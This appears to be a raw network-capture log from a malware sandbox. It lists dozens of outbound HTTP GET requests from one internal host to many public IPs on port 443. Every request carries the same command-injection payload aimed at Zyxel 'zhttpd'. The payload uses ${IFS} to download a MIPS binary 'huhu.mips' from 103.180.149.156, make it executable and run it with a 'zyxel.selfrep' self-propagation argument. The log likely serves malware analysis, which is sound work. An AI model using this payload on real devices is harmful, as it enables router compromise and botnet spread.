                                                      Feb 2, 2024 06:35:01.124177933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      262192.168.2.1450534161.53.138.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124197006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      263192.168.2.1455312203.73.166.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124437094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      264192.168.2.1449922185.163.126.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124681950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      265192.168.2.143929860.165.109.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124767065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      266192.168.2.145276494.239.1.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124789000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      267192.168.2.1460636155.16.79.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124802113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      268192.168.2.144050464.88.126.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124849081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      269192.168.2.144253288.64.148.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124918938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      270192.168.2.1432830101.183.100.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124978065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      271192.168.2.143715636.92.131.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124978065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      272192.168.2.1442270223.10.80.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.125096083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      273192.168.2.143917040.35.162.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.125097036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      274192.168.2.1437386198.72.75.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.125097036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      275192.168.2.14598645.170.137.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.125283957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      276192.168.2.1437572183.234.94.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:02.129906893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      277192.168.2.143395654.58.62.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:02.129981995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      278192.168.2.1449440220.104.40.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:02.129997015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      279192.168.2.1445872185.53.3.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:02.130023003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      280192.168.2.1436568115.153.106.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133162975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      281192.168.2.145681268.27.88.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133199930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      282192.168.2.1442850111.33.87.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133217096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      283192.168.2.1453116166.1.108.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133241892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      284192.168.2.1438770120.239.63.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133289099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      285192.168.2.144229886.78.4.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133301973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      286192.168.2.1445850211.127.206.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133343935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      287192.168.2.144818014.16.61.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133366108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      288192.168.2.1435206138.181.31.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133407116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      289192.168.2.14384022.58.151.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133436918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      290192.168.2.144709442.34.53.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133459091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      291192.168.2.143946292.149.103.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133488894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      292192.168.2.145317273.202.121.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133517027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      293192.168.2.1459038124.135.167.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133548021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      294192.168.2.1454526135.34.45.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133584023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      295192.168.2.1435320142.88.68.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133613110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      296192.168.2.1450736216.14.165.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133641005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      297192.168.2.1434214221.91.244.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133675098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      298192.168.2.1447690106.153.100.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133692980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      299192.168.2.1447000212.27.205.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133725882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      300192.168.2.1440828119.144.128.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133770943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      301192.168.2.145774840.9.100.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133795977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      302192.168.2.1433180139.218.131.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133812904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      303192.168.2.1443348159.59.27.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133847952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      304192.168.2.1435894109.107.38.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133876085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      305192.168.2.1435104120.93.217.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133910894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      306192.168.2.1449040162.227.210.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133928061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      307192.168.2.143906094.86.27.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133961916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      308192.168.2.1447852220.8.117.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.133980989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      309192.168.2.145345038.65.56.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134011984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      310192.168.2.145940293.221.224.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134025097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      311192.168.2.1433430167.53.83.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134069920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      312192.168.2.144840487.187.38.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134098053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      313192.168.2.1460978111.242.78.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134135962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      314192.168.2.1442898101.179.216.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134519100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      315192.168.2.1452902117.52.225.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134530067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      316192.168.2.144027639.190.116.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:03.134573936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      317192.168.2.1448866131.60.248.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.138951063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      318192.168.2.1436208211.43.37.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.138999939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      319192.168.2.1444298130.83.243.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.139029980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      320192.168.2.145695061.138.80.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.139074087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      321192.168.2.1447804113.29.1.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.139146090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      322192.168.2.1436686223.160.73.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.139166117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      323192.168.2.1452484135.230.149.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:04.139292955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      324192.168.2.145865680.39.81.188443
                                                      TimestampBytes transferredDirectionData
